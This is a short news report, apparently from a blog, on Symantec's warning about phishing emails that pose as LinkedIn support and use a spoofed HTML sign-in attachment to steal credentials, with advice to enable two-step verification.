Cyber-criminals are now
targeting LinkedIn users by scamming them into sharing their credentials by
sending out mails claiming to be from the support team of the world’s largest
professional networking firm, security software firm Symantec warned.
Founded in 2003,
LinkedIn has over 300 million members globally, of which more than 26 million
users are in India (as of June 2014). Symantec said that over the last
week it has observed an increase in phishing emails claiming to be from the
US-based firm’s support team.
No immediate response
was available from LinkedIn.
“The body of the email
claims that irregular activities have prompted a ‘compulsory security update’
for the recipients’ LinkedIn account,” Symantec said.
The email goes on to say
that in order to secure their account, the recipient needs to download the
attached form (an HTML attachment) and follow the instructions, it added.
The attachment is a copy
of the real LinkedIn.com website, it said.
“However, the website’s
source has been modified, so if the recipient uses this web page to sign in to
their LinkedIn account, their credentials will be sent directly to the
attacker,” Symantec warned.
The email uses a
lowercase ‘i’ to spell LinkedIn, instead of capital ‘I’ as used by the firm.
“The difference in
characters is indiscernible to the eye and functions as a way to evade mail
filters. Also, the HTML attachment method bypasses browser blacklists that
often flag suspicious websites to help prevent users from being phished,”
Symantec said.
The security firm said
LinkedIn users should consider turning on two-step verification as this would
prevent an attacker to access the account even if a user’s credentials are
compromised.
No comments:
Post a Comment